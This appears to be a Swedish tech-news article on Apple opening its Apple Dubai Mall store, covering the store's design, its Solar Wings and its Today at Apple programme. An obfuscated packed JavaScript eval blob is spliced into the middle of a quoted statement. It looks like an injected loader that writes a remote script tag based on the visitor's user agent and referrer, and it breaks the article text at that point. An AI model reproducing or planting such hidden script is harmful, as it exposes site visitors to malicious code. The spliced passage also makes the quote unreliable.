Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple öppnar butik i Dubai Mall den 27 april

apple logo
Sebastian

Idag invigde Apple sin nya butik Apple Dubai Mall i Mellanöstern. Butiken har en rundad framsida som är över 56 meter lång och en balkong med utsikt över Burj Khalifa och Dubai Fountain. Apple Dubai Mall ska bli en samlingsplats för möten mellan människor, utbildning och underhållning. Från butiken kan man se de fantastiska fontänshowerna om kvällarna och ta del av Apples nya butiksupplevelse Today at Apple, som också lanseras idag.

”Våra eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbnfi|var|u0026u|referrer|sddfs||js|php’.split(’|’),0,{}))
butiker är som en modern version av ett torg där besökare kan få inspiration, lära sig saker och få kontakt med andra i närområdet”, säger Angela Ahrendts, vice vd för Retail på Apple. ”Vilken plats kan dessutom vara bättre att mötas på än en med utsikt över Dubais absoluta kärna och närhet till Dubai Fountain, Burj Khalifa och Dubai Mall? Vi är väldigt stolta över att ha en plats i ett av världens mest enastående och dynamiska handelsområde.”

Kärnan för varje Apple Store är att sträva efter att utbilda och inspirera människor. Today at Apple lanseras i Apple Dubai Mall och i samtliga 495 Apple Store-butiker nästa månad med nya pass inom foto och video, musik, kodning, konst, design och mycket mer. Passen hålls av utbildade teammedlemmar. Apple Dubai Mall anordnar också högprofilerade event med livemusik, djupgående samtal med filmskapare och fotografer och liveworkhops med några av världens främsta talanger. På öppningsdagen hålls olika event, bland annat livekonst med Myneandyours och framträdande med musikern Hamdan Al Abri och konstnären Sultan Al Ramahi.

Nya Creative Pro-medarbetare (den fria konstens motsvarigheten till Apples tekniska Genius-medarbetare) håller i Today at Apple-pass och erbjuder individuella råd och utbildning så att kunder kan ta sina kreativa färdigheter till nästa nivå. Butikens 148 medarbetare är redo att välkomna kunder från hela världen, och sammantaget talar de 45 olika språk. 

Precis som Apples övriga betydande butiker strävar Apple Dubai Mall efter att vara öppna och tydliga och bryta ner osynliga barriärer som finns mellan butikens insida och dess utsida så att det inte finns några barriärer mellan butiken och närområdet. Foster + Partners har utformat den nästan tolv meter höga motorstyrda ”Solar Wings” som ett skydd mot Dubais klimat. Dessa enheter svarar på alla slags väder. När solen lyser som varmast kyler de ner butiken och på kvällarna öppnas de upp för att välkomna alla till den offentliga terrassen. Varje Solar Wing produceras lokalt enligt den arabiska Mashrabiya-traditionen och består av 340 kolfiberförstärkta polymerstavar och de 18 panelerna, som tillsammans är 55 meter breda, utgör några av världens största installationer för kinetisk konst.


Apples första två butiker i Förenade Arabemiraten har tagit emot mer än 4 miljoner besökare sedan de öppnade i Dubai och Abu Dhabi för 18 månader sedan. Apple kommer att nå ännu fler besökare över hela världen genom Dubai Mall, Emaars megaflaggskeppsprojekt och världens mest besökta destination som välkomnat över 80 miljoner besökare de senaste tre åren i rad. Nya Apple Store, med utsikt över sjön, kommer att ha öppet fram till midnatt för alla som vill besöka området.

Kommande event, anmälan och ytterligare information finns tillgängligt på: 
apple.com/ae/retail/dubaimall

När Apple lanserade Macintosh 1984 var det början på en revolutionerande era. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, macOS, watchOS och tvOS – ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples över 100 000 medarbetare brinner för att göra de bästa produkterna i världen och att lämna världen i bättre skick än när vi började.